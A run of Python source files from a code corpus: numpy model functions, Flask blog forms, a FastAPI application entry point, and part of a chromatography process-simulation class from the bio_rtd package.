assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.sum(x, axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_spec(x, a=[0.58, -1, -1.0, 0, 0., 0.]):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
y = a[0]*(x**2).prod(axis=1) + \
a[1]*x.prod(axis=1) + \
a[2]*(x**2).sum(axis=1) + \
a[3] * x.sum(axis=1) + \
a[4] * np.sin(x).sum(axis=1) + \
a[5] * np.cos(x).sum(axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_cum_sum_weight(x, weights=None, use_sum=True, const=[0., 0., 0., 1., 0., 0.]):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
weights : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if weights is None:
weights = np.zeros((dim, dim))
corr_dim = dim * (dim-1)/2
k = 1
for i in range(1, dim):
for j in range(i):
weights[i, j] = k
k += 1
weights /= corr_dim
if weights.ndim == 1:
weights = weights.reshape(-1, 1)
assert weights.shape[0] == dim, "Shape not good"
elif weights.ndim > 2:
raise AttributeError('Dimension problem for constant a')
if use_sum:
y = 1
for i in range(1, dim):
for j in range(i):
y *= (1. + weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const))
else:
y = 0
for i in range(1, dim):
for j in range(i):
y += weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const)
return y
def multi_output_func_sum(x, output_dim=2):
"""Additive model function with multi output.
Parameters
----------
x : np.ndarray
The input values.
output_dim : int
The number of output dimension.
Returns
-------
y : [i * x]
"""
return np.asarray([x.sum(axis=1)*a for a in range(output_dim)]).T | 2.53125 | 3 |
app/main/forms.py | ingabire1/blog | 0 | 10856 | <filename>app/main/forms.py
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField
from wtforms.validators import Required
class ReviewForm(FlaskForm):
title = StringField('Review title',validators=[Required()])
review = TextAreaField('Movie review', validators=[Required()])
submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
# class LoginForm(FlaskForm):
# email = StringField('Your Email Address',validators=[Required(),Email()])
# password = PasswordField('Password',validators =[Required()])
# remember = BooleanField('Remember me')
# submit = SubmitField('Sign In')
class BlogForm(FlaskForm):
# my_category = StringField('Category', validators=[Required()])
title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
post = SubmitField('Post Blog')
class CommentForm(FlaskForm):
name = StringField('Name',validators=[Required()])
# email = StringField('Email', validators=[Required()],render_kw={"placeholder": "Email"})
comment = TextAreaField('Enter Comment', validators=[Required()])
post = SubmitField('Post Comment')
class SubscriptionForm(FlaskForm):
name = StringField('First Name', validators=[Required()])
subscription_data = StringField('Email', validators=[Required()])
subscribe = SubmitField('Subscribe')
class UpdatePostForm(FlaskForm):
# title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
submit=SubmitField('SUBMIT')
| 2.765625 | 3 |
SEPHIRA/FastAPI/main.py | dman926/Flask-API | 4 | 10857 | <filename>SEPHIRA/FastAPI/main.py
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from starlette import status
from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from starlette.types import ASGIApp
from config import APISettings, CORSSettings, FastAPISettings, PayPalSettings, UvicornSettings, ShopSettings, NowPaymentsSettings
import logging
####
# Custom Middlewares #
####
class LimitPostContentSizeMiddleware(BaseHTTPMiddleware):
def __init__(self, app: ASGIApp, max_upload_size: int) -> None:
super().__init__(app)
self.max_upload_size = max_upload_size
async def dispatch(self, request: Request, call_next: RequestResponseEndpoint) -> Response:
if request.method == 'POST':
if 'content-length' not in request.headers:
return Response(status_code=status.HTTP_411_LENGTH_REQUIRED)
content_length = int(request.headers['content-lenght'])
if content_length > self.max_upload_size:
return Response(status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE)
return await call_next(request)
####
# #
####
logging.basicConfig(filename="log.log", level=logging.INFO, format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
logger = logging.getLogger(__name__)
app = FastAPI(debug=FastAPISettings.DEBUG)
app.add_middleware(
CORSMiddleware,
allow_origins=CORSSettings.ALLOW_ORIGINS,
allow_methods=['*'],
allow_headers=['*']
)
if UvicornSettings.MAX_CONTENT_SIZE:
app.add_middleware(
LimitPostContentSizeMiddleware,
max_upload_size=UvicornSettings.MAX_CONTENT_SIZE
)
@app.on_event('startup')
async def startup():
logger.info('-- STARTING UP --')
print('-- STARTING UP --')
from database.db import initialize_db
initialize_db()
from resources.routes import initialize_routes
initialize_routes(app)
if ShopSettings.ENABLE:
if NowPaymentsSettings.ENABLE:
from resources.nowpayments import getNowPaymentsStatus, setCachedAvailableCoins
if await getNowPaymentsStatus():
print('NOWPayments is online. Fetching available coins...')
for i in range(NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT):
if await setCachedAvailableCoins():
print('NOWPayments coins cached.')
break
else:
print('Failed to get NOWPayments coins.')
if i < NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1:
print(f'Retrying {NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1 - i} time(s).')
else:
print('NOWPayments not responding.')
print(f'Available coins will be set on the next reqest to {APISettings.ROUTE_BASE}payment/nowpayments/available-coins request if NOWPayments is available.')
print('-- STARTED UP --')
logger.info('-- STARTED UP --')
@app.on_event('shutdown')
async def shutdown():
logger.info('-- SHUTTING DOWN --')
print('-- SHUTTING DOWN --')
from database.db import close_db
close_db()
import os
import shutil
if os.path.exists('cache'):
shutil.rmtree('cache')
print('-- SHUT DOWN --')
logger.info('-- SHUT DOWN --')
if __name__== '__main__':
import uvicorn
uvicorn.run('main:app', reload=UvicornSettings.USE_RELOADER, log_level=UvicornSettings.LOG_LEVEL, port=UvicornSettings.PORT) | 2.03125 | 2 |
bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | 5 | 10858 | """Semi continuous unit operations.
Unit operations that accept constant or box-shaped flow rate profile
and provide periodic flow rate profile.
"""
__all__ = ['AlternatingChromatography', 'ACC', 'PCC', 'PCCWithWashDesorption']
__version__ = '0.7.1'
__author__ = '<NAME>'
import typing as _typing
import numpy as _np
import scipy.interpolate as _interp
from bio_rtd.chromatography import bt_load as _bt_load
import bio_rtd.utils as _utils
import bio_rtd.core as _core
import bio_rtd.pdf as _pdf
class AlternatingChromatography(_core.UnitOperation):
"""Simulation of alternating chromatography.
This class implements logic common to various types of alternating
chromatography. It has a role of a base class for
specific types of alternating chromatography to extend.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "AC".
Notes
-----
**Quick description of which attributes are available:**
Non-binding species (optional):
* :attr:`non_binding_species`
Column volume (exactly one required):
* :attr:`cv`
* :attr:`ft_mean_retentate` and :attr:`column_porosity_retentate`
Column porosity for binding species (required in case of
:attr:`ft_mean_retentate` or wash or load recycling):
* :attr:`column_porosity_retentate`
Equilibration step duration (optional, if both, the values are
added together):
* :attr:`equilibration_cv`
* :attr:`equilibration_t`
Equilibration step flow rate (exactly one needed):
* :attr:`equilibration_f` - absolute, has priority if defined
* :attr:`equilibration_f_rel` - relative, default = 1
Load step duration:
* :attr:`load_cv` - preferred
* :attr:`load_c_end_ss` - concentration limit for breakthrough; also
requires :attr:`load_recycle_pdf`
* :attr:`load_c_end_relative_ss` - concentration limit for
breakthrough relative to steady-state load concentration; also
requires :attr:`load_recycle_pdf`
Iterative optimization of estimation of load step duration
(ignored if :attr:`load_cv` is defined):
* :attr:`load_c_end_estimate_with_iterative_solver` - default = True
* :attr:`load_c_end_estimate_with_iter_solver_max_iter` - default =
1000
Extension of first load step (optional; ignored if no recycling):
* :attr:`load_extend_first_cycle` - default = `False`
* :attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t` - added together if both defined
Load linear velocity - only for column height determination
(optional):
* :attr:`load_target_lin_velocity`
Wash step duration (optional, if both, the values are
added together):
* :attr:`wash_cv`
* :attr:`wash_t`
Wash step flow rate (exactly one needed):
* :attr:`wash_f` - absolute, has priority if defined
* :attr:`wash_f_rel` - relative, default = 1
Unaccounted losses - applied before peak cut (optional):
* :attr:`unaccounted_losses_rel` - relative, default = 1
Elution step duration (optional, if both, the values are
added together):
* :attr:`elution_cv`
* :attr:`elution_t`
Elution step flow rate (exactly one needed):
* :attr:`elution_f` - absolute, has priority if defined
* :attr:`elution_f_rel` - relative, default = 1
Elution buffer composition (optional):
* :attr:`elution_buffer_c`
Elution peak position duration - first momentum
(optional, if both, the values are added together):
* :attr:`elution_peak_position_cv`
* :attr:`elution_peak_position_t`
Elution peak cut start (one is required):
* :attr:`elution_peak_cut_start_t`
* :attr:`elution_peak_cut_start_cv`
* :attr:`elution_peak_cut_start_c_rel_to_peak_max`
* :attr:`elution_peak_cut_start_peak_area_share`
Elution peak cut end (one is required):
* :attr:`elution_peak_cut_end_t`
* :attr:`elution_peak_cut_end_cv`
* :attr:`elution_peak_cut_end_c_rel_to_peak_max`
* :attr:`elution_peak_cut_end_peak_area_share`
Regeneration step duration (optional, if both, the values are
added together):
* :attr:`regeneration_cv`
* :attr:`regeneration_t`
Regeneration step flow rate (exactly one needed):
* :attr:`regeneration_f` - absolute, has priority if defined
* :attr:`regeneration_f_rel` - relative, default = 1
Wash desorption (optional, also check if class supports it):
* :attr:`wash_desorption` - default = `False`
Load breakthrough recycle (optional):
* :attr:`load_recycle` - default = `False`
Load breakthrough propagation dynamics
(required if :attr:`load_recycle` is `True`
or :attr:`load_c_end_ss` is defined or
or :attr:`load_c_end_relative_ss` is defined):
* :attr:`load_recycle_pdf`
Wash recycle (optional):
* :attr:`wash_recycle` - default = `False`
Duration of wash recycling
(optional; ignored if :attr:`wash_recycle` is `False`):
* :attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` - summed together if both defined.
* Entire wash step if
:attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` are not defined.
Please note that subclasses might introduce new attributes or change
the default values of existing attributes.
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "AC"):
super().__init__(t, uo_id, gui_title)
# Bind parameters.
self.load_bt: _core.ChromatographyLoadBreakthrough = load_bt
"""Determines what part of load material binds to the column."""
self.elution_peak_shape: _core.PDF = peak_shape_pdf
"""Elution peak shape."""
self.non_binding_species: _typing.Sequence[int] = []
"""Process buffer species that are NOT binding to the column.
Indexing starts with 0.
"""
self.cv: float = -1
"""Column volume.
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv` (this one)
* :attr:`ft_mean_retentate`
and :attr:`column_porosity_retentate`
"""
self.ft_mean_retentate: float = -1
"""Flow-through time of retentate under non-binding conditions.
Used to define column volume (independently of scale).
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv`
* :attr:`ft_mean_retentate` (this one) and
:attr:`column_porosity_retentate`
"""
self.column_porosity_retentate: float = -1
"""Column porosity for retentate under non-binding conditions.
Required in case :attr:`ft_mean_retentate` is used to define
column volume.
Required in case :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss` are used to estimate
load step duration.
Required in case of load or wash recycling.
"""
self.equilibration_cv: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_t: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_f: float = -1
"""Equilibration step flow rate.
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f` (this one)
* :attr:`equilibration_f_rel`
"""
self.equilibration_f_rel: float = 1
"""Equilibration step flow rate relative to load flow rate.
Default = 1.
Equilibration step flow rate = :attr:`equilibration_f_rel`
* `load flow rate`
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f`
* :attr:`equilibration_f_rel` (this one)
"""
# Duration of the load phase.
self.load_cv: float = -1 # load duration in CV
"""Load phase duration in CV.
This is preferable way to define the duration of the load step
as it does not require any estimations about steady state.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (this one)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_ss: _typing.Optional[_np.ndarray] = None
"""Load phase switch based on target product breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the breakthrough reaches
specified concentration.
Steady state simulation requires
:attr:`column_porosity_retentate`
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss` (this one)
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_relative_ss: float = -1
"""Load phase switch based on relative breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the product (binding species)
in the breakthrough reaches specified relative concentration
(relative to load concentration in steady-state operation).
Steady state simulation requires
:attr:`column_porosity_retentate`
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss` (this one)
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_estimate_with_iterative_solver: bool = True
"""Finer optimization of cycle length estimation.
Default = `True`.
In case load step duration is estimated based of breakthrough
criteria (i.e. by :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss`), the model needs to simulate
steady-state operation in order to determine fixed load time.
This parameters enables iterative solver that allows more
precise estimation but might slow down the simulation.
Notes
-----
Max number of iteration steps is defined by
:attr:`load_c_end_estimate_with_iter_solver_max_iter`.
"""
self.load_c_end_estimate_with_iter_solver_max_iter: int = 1000
"""Max steps for optimization of cycle length estimation.
Default = 1000.
See Also
--------
:attr:`load_c_end_estimate_with_iterative_solver`
"""
self.load_extend_first_cycle: bool = False
"""Extend first load phase to achieve a faster steady-state.
Only relevant in case wash or load is recycled.
The duration of extension is defined by:
* :attr:`load_extend_first_cycle_cv` or
* :attr:`load_extend_first_cycle_t` or
* is determined automatically.
"""
self.load_extend_first_cycle_cv: float = -1
"""Duration of first load phase extension in column volumes.
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration if defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_extend_first_cycle_t: float = -1
"""Duration of first load phase extension (time).
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration if defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_target_lin_velocity: float = -1
"""Target load linear velocity.
It is used to provide information about required column height.
It does not have any impact on the rest of the model.
Units need to match other units in the model.
"""
self.wash_cv: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_t: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_f: float = -1
"""Wash step flow rate.
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f` (this one)
* :attr:`wash_f_rel`
"""
self.wash_f_rel: float = 1
"""Wash step flow rate relative to load flow rate. Default = 1.
Wash step flow rate = :attr:`wash_f_rel`
* `load flow rate`
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f`
* :attr:`wash_f_rel` (this one)
"""
self.unaccounted_losses_rel: float = 0
"""Unaccounted losses as a share of bound material.
Elution peak is scaled down by 1 - `unaccounted_losses_rel`
before applying peak cut criteria.
"""
self.elution_cv: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_t: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_f: float = -1
"""Elution step flow rate.
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f` (this one)
* :attr:`elution_f_rel`
"""
self.elution_f_rel: float = 1
"""Elution step flow rate relative to load flow rate.
Default = 1.
Elution step flow rate = :attr:`elution_f_rel`
* `load flow rate`
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f`
* :attr:`elution_f_rel` (this one)
"""
self.elution_buffer_c: _np.ndarray = _np.array([])
"""Elution buffer composition.
Default = empty array (= all components are 0).
If defined it must have a value for each specie.
"""
self.elution_peak_position_cv: float = -1
"""Position (cv) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_position_t: float = -1
"""Position (time) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_cut_start_t: float = -1
"""Elution peak cut start (time).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_cv: float = -1
"""Elution peak cut start (cv).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_c_rel_to_peak_max: float = -1
"""Elution peak cut start (signal relative to peak max).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_peak_area_share: float = -1
"""Elution peak cut start (share of total peak area).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_end_t: float = -1
"""Elution peak cut end (time).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_cv: float = -1
"""Elution peak cut end (cv).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_c_rel_to_peak_max: float = -1
"""Elution peak cut end (signal relative to peak max).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_peak_area_share: float = -1
"""Elution peak cut end (share of total peak area).
Exactly one peak cut end criteria should be defined.
"""
self.regeneration_cv: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_t: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_f: float = -1
"""Regeneration step flow rate.
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f` (this one)
* :attr:`regeneration_f_rel`
"""
self.regeneration_f_rel: float = 1
"""Regeneration step flow rate relative to load flow rate.
Default = 1.
Regeneration step flow rate = :attr:`regeneration_f_rel`
* `load flow rate`
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f`
* :attr:`regeneration_f_rel` (this one)
"""
self.wash_desorption: bool = False
"""Enable wash desorption.
Make sure the class implements the desorption dynamics.
"""
self.load_recycle: bool = False
"""Recycle load breakthrough. Default = False."""
self.load_recycle_pdf: _typing.Optional[_core.PDF] = None
"""PDF of wash and/or unbound load traveling through the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
"""
self.wash_recycle: bool = False
"""Recycle wash. Default = False.
Wash is recycled onto 3rd column while the 2nd is on load step.
After the wash recycle, the 3rd column is connected to 2nd
column to recycle load breakthrough material.
"""
self.wash_recycle_duration_cv: float = -1
"""Duration of wash recycle (cv).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
self.wash_recycle_duration_t: float = -1
"""Duration of wash recycle (time).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_t` and
:attr:`wash_recycle_duration_cv`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
@_core.UnitOperation.log.setter
def log(self, logger: _core._logger.RtdLogger):
"""Propagates logger across other elements that support it."""
# Default logic.
self._logger = logger
self._logger.set_data_tree(self._log_entity_id, self._log_tree)
# Propagate logger across other elements with logging.
if self.load_recycle_pdf is not None:
self.load_recycle_pdf.set_logger_from_parent(self.uo_id, logger)
if self.load_recycle_pdf is not None:
self.elution_peak_shape.set_logger_from_parent(self.uo_id, logger)
if self.load_recycle_pdf is not None:
self.load_bt.set_logger_from_parent(self.uo_id, logger)
def _get_flow_value(self,
step_name: str, var_name: str,
flow: float, rel_flow: float) -> float:
"""Calc flow rate of chromatographic step.
If `flow` is specified, `flow` is used.
Otherwise `rel_flow` == flow rate relative to load flow rate is
used.
If none are positive, then the load flow rate is used
and a warning is logged.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
flow
Flow rate.
rel_flow
Flow rate relative to load flow rate.
Returns
-------
float
Flow rate.
"""
if flow > 0:
self.log.i_data(self._log_tree, var_name, flow)
elif rel_flow > 0:
flow = rel_flow * self._load_f
self.log.i_data(self._log_tree, var_name, flow)
else:
self.log.w(f"{step_name} step flow rate is not defined,"
f" using load flow rate instead.")
flow = self._load_f
return flow
def _get_time_value(self,
step_name: str, var_name: str,
t: float, cv: float, flow: float) -> float:
"""Calc duration of chromatographic step.
If the step duration is specified in cv and in t, then the
value are added together.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
t
Duration (time).
cv
Duration (cv).
flow
Flow rate (required if `cv` > 0).
Returns
-------
float
Total step duration (time).
"""
# Calc.
t_sum = max(t, 0)
if cv > 0:
assert flow > 0, f"{step_name}: Flow rate must be defined (> 0)" \
f" if the duration is specified in CVs."
assert self._cv > 0, f"CV must be determined (by `calc_cv`)" \
f" before calculating duration based on CVs."
t_sum += cv * self._cv / flow # sum
# Log.
if t <= 0 and cv <= 0:
self.log.w(step_name + " time is not defined")
else:
self.log.i_data(self._log_tree, var_name, t_sum)
return t_sum
def _assert_non_binding_species(self):
"""Make sure binding species list is valid."""
if len(self.non_binding_species) > 0:
assert max(self.non_binding_species) < self._n_species, \
"Index of non_binding_species too large (indexes start with 0)"
assert list(set(self.non_binding_species)) \
== list(self.non_binding_species), \
"List of non_binding_species should have ascending order"
assert len(self.non_binding_species) < self._n_species, \
"All species cannot be non-binding."
# Log.
self.log.i_data(self._log_tree,
'non_binding_species',
self.non_binding_species)
def _calc_load_f(self):
"""Determine load flow rate (when on)."""
assert self._is_flow_box_shaped(), "Inlet flow must be box shaped."
self._load_f = self._f.max()
self.log.d_data(self._log_tree, 'load_f', self._load_f)
def _calc_cv(self):
"""Determine column volume."""
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.ERROR,
cv=self.cv,
ft_mean_retentate=self.ft_mean_retentate,
)
if self.cv > 0:
self._cv = self.cv
else: # `self.ft_mean_retentate` > 0.
assert self.column_porosity_retentate > 0, \
f"porosity_retentate must be defined to calc CV from " \
f" `self.ft_mean_retentate`."
assert self._load_f > 0, f"Load flow rate must be defined to" \
f" calc CV from `self.ft_mean_retentate`."
self._cv = self.ft_mean_retentate * self._load_f \
/ self.column_porosity_retentate
# Log.
self.log.i_data(self._log_tree, 'cv', self._cv)
def _report_column_dimensions(self):
"""Report column dimensions based on load linear velocity."""
if self.load_target_lin_velocity > 0:
self._col_h = self._cv * self.load_target_lin_velocity \
/ self._load_f
self.log.i_data(self._log_tree, "column_h", self._col_h)
self.log.i_data(self._log_tree,
"column_d",
(self._cv / self._col_h / _np.pi) ** 0.5 * 2)
def _calc_equilibration_t(self):
"""Determine equilibration step duration."""
if self.equilibration_cv > 0:
# Flow rate.
eq_f = self._get_flow_value("Equilibration",
"equilibration_f",
self.equilibration_f,
self.equilibration_f_rel)
# Duration.
self._equilibration_t = self._get_time_value("Equilibration",
"equilibration_t",
self.equilibration_t,
self.equilibration_cv,
eq_f)
else:
# Duration.
self._equilibration_t = max(self.equilibration_t, 0)
# Log.
self.log.i_data(self._log_tree,
'equilibration_t',
self._equilibration_t)
def _calc_wash_t_and_f(self):
"""Determine wash step flow rate and duration."""
# Flow rate.
self._wash_f = self._get_flow_value("Wash",
"wash_f",
self.wash_f,
self.wash_f_rel)
# Duration.
self._wash_t = self._get_time_value("Wash",
"wash_t",
self.wash_t,
self.wash_cv,
self._wash_f)
def _calc_elution_t_and_f(self):
"""Determine elution step flow rate and duration."""
# Flow rate.
self._elution_f = self._get_flow_value("Elution",
"elution_f",
self.elution_f,
self.elution_f_rel)
# Duration.
self._elution_t = self._get_time_value("Elution",
"elution_t",
self.elution_t,
self.elution_cv,
self._elution_f)
def _calc_elution_peak_t(self):
"""Determine elution peak mean position (1st momentum)."""
self._elution_peak_t = self._get_time_value(
"elution peak position",
"elution_peak_position_t",
self.elution_peak_position_t,
self.elution_peak_position_cv,
self._elution_f
)
def _update_elution_peak_pdf(self):
"""Update elution peak PDF."""
assert self._elution_peak_t > 0
assert self._elution_f > 0
# Calc elution peak shape.
self.elution_peak_shape.update_pdf(
rt_mean=self._elution_peak_t,
v_void=self._elution_peak_t * self._elution_f,
f=self._elution_f
)
self._p_elution_peak = \
self.elution_peak_shape.get_p() * (1 - self.unaccounted_losses_rel)
self.log.d_data(self._log_tree,
"p_elution_peak",
self._p_elution_peak)
def _calc_elution_peak_cut_i_start_and_i_end(self):
"""Calc elution peak cut start and end in form of time steps.
Values are relative to the beginning of the elution step.
"""
elution_peak_pdf: _np.ndarray = self._p_elution_peak.copy()
# Peak cut start.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_start_peak_area_share=self
.elution_peak_cut_start_peak_area_share,
elution_peak_cut_start_c_rel_to_peak_max=self
.elution_peak_cut_start_c_rel_to_peak_max,
elution_peak_cut_start_cv=self.elution_peak_cut_start_cv,
elution_peak_cut_start_t=self.elution_peak_cut_start_t
)
# Calc `elution_peak_cut_start_i`.
if self.elution_peak_cut_start_peak_area_share >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= self.elution_peak_cut_start_peak_area_share
)
elif self.elution_peak_cut_start_c_rel_to_peak_max >= 0:
elution_peak_cut_start_i = _utils.vectors.true_start(
elution_peak_pdf
>= self.elution_peak_cut_start_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_start_cv >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_start_t >= 0:
elution_peak_cut_start_i = \
int(self.elution_peak_cut_start_t / self._dt)
else:
self.log.w(f"Elution peak cut start is not defined."
f" Now collecting from the beginning"
f" of the elution phase.")
elution_peak_cut_start_i = 0
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_start_i",
elution_peak_cut_start_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_start_t",
elution_peak_cut_start_i * self._dt)
# Peak cut end.
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.WARNING,
elution_peak_cut_end_peak_area_share=self
.elution_peak_cut_end_peak_area_share,
elution_peak_cut_end_c_rel_to_peak_max=self
.elution_peak_cut_end_c_rel_to_peak_max,
elution_peak_cut_end_cv=self.elution_peak_cut_end_cv,
elution_peak_cut_end_t=self.elution_peak_cut_end_t,
)
# Calc `elution_peak_cut_end_i`.
if self.elution_peak_cut_end_peak_area_share >= 0:
elution_peak_cut_end_i = _utils.vectors.true_start(
_np.cumsum(elution_peak_pdf * self._dt)
>= (1 - self.elution_peak_cut_end_peak_area_share)
)
elif self.elution_peak_cut_end_c_rel_to_peak_max >= 0:
elution_peak_cut_end_i = _utils.vectors.true_end(
elution_peak_pdf
>= self.elution_peak_cut_end_c_rel_to_peak_max
* elution_peak_pdf.max()
)
elif self.elution_peak_cut_end_cv >= 0:
elution_peak_cut_end_i = \
int(self.elution_peak_cut_end_cv
* self._cv / self._elution_f / self._dt)
elif self.elution_peak_cut_end_t >= 0:
elution_peak_cut_end_i = \
_utils.vectors.true_end(self._t < self.elution_peak_cut_end_t)
else:
self.log.w(f"Elution peak cut end is not defined."
f" Now collecting to the end of the elution phase.")
elution_peak_cut_end_i = elution_peak_pdf.size
self._elution_peak_cut_start_i = elution_peak_cut_start_i
self._elution_peak_cut_end_i = elution_peak_cut_end_i
# Log.
self.log.i_data(self._log_tree,
"elution_peak_cut_end_i",
elution_peak_cut_end_i)
self.log.i_data(self._log_tree,
"elution_peak_cut_end_t",
elution_peak_cut_end_i * self._dt)
if self._elution_peak_cut_end_i * self._dt < self._elution_peak_t:
self.log.w(f"Peak end is cut before its maximum.")
if self._elution_peak_cut_end_i * self._dt > self._elution_t:
self.log.w(f"Peak cut end exceeds elution step duration.")
def _calc_elution_peak_mask(self):
